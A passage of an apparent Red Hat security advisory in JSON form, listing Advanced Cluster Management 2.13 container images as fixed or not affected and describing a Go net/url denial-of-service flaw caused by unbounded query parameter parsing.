"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
